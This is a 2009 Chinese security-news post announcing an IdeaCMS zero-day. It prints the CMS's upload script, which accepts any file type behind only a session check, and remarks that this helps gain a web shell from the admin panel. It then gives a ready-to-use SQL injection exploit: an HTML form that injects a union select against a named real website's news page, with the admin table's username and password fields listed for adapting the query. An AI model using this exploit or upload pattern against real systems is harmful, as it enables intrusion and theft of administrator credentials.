pc软件 文章资讯 手机软件

您当前的位置→图文中心新闻资讯安全播报IdeaCMS 0day
阅读排行

IdeaCMS 0day


2009/8/7  编辑:佚名 来源:本站整理

鸡肋的上传漏洞 不过对后台拿shell做了点贡献~

upinc.asp:

<!--#include file="chkuser.asp"-->

<%Server.ScriptTimeOut=5000%>

<style type="text/css">

*{ padding:0px; margin:0px; font-size:12px}

a{ color:#666666;}

a:hover{ color:#000000}

</style>

<!--#include FILE="upload_5xsoft.inc"-->

<%

f="Uploadpic/" '图片存放文件夹路径

n=request.QueryString("n")

x=request.QueryString("x")

m=request("m")

if m="ok" then

set upload=new upload_5xsoft

set file=upload.file("file1")

formPath=f

if file.fileSize>0 then

file.saveAs Server.mappath(formPath&file.FileName)

%>

<script>

<%if x=1 then%>

parent.document.all.<%=n%>.value=parent.document.all.<%=n%>.value+"<%=f%><%=File.FileName%>";

<%else%>

parent.document.all.<%=n%>.value="admin/<%=f%><%=File.FileName%>";

<%end if%>

</script>

<input value="admin/<%=f%><%=File.FileName%>" name="text" type="hidden">

<a href="#" onclick="window.clipboardData.setData('text',text.value);">[复制地址]</a> <a href="upinc.asp?n=<%=n%>&x=<%=x%>">[重新上传]</a>

<%

end if

set file=nothing

set upload=nothing

else

%>

<form name="form1" method="post" action="upinc.asp?m=ok&n=<%=n%>&x=<%=x%>" enctype="multipart/form-data" style="margin:0px; margin:0px;" >

<input type="file" name="file1" style="width:200" class="tx1" value=""><input name="" type="submit" value="上传" />

</form>

<%end if%>

包含的那个文件只是用session验证下是否为空。 。 很鸡肋的~

这个上传 能上传任何文件。

下面是一个注射漏洞的exp 直接放exp了 不分析了 有兴趣的去down份下来分析下:

<H1>IdeaCMS 's EXP --code by Link</H1><br><br>

<form action="http://www.taikoosoft.com/NewsShow.asp?id=30+union select 1,2,3,4,5,6,7,8,9,10

from admin where" method=post name=myform enctype="multipart/form-data">

<input type=submit value=Fuck>

</form>

/*表里面有三个字段,

admin_user

admin_pwd

ID

自己改变下语句日把

很简单。 不分析了

相关文章

Android 8.OBUG闹铃失效:功能强大的Android8.0系统已经公布,很多朋友也都用上了期待已久的新系统。

快手ID如何才能升级到快手号?快手ID升级至快手号详细教程:如今网上都是各种小视频,这种小视频“风气”是由于一款名为快手的软件一手带起的,相信大家对快手都很是熟悉。

widows7CPU温度观察,Win7系统查看CPU温度的方法:在平时使用电脑的过程中,我们常常会查看CPU温度,因为如果CPU温度过高,电脑就会运行缓慢。

发表评论
网站帮助 - 广告合作 - 下载声明 - 网站地图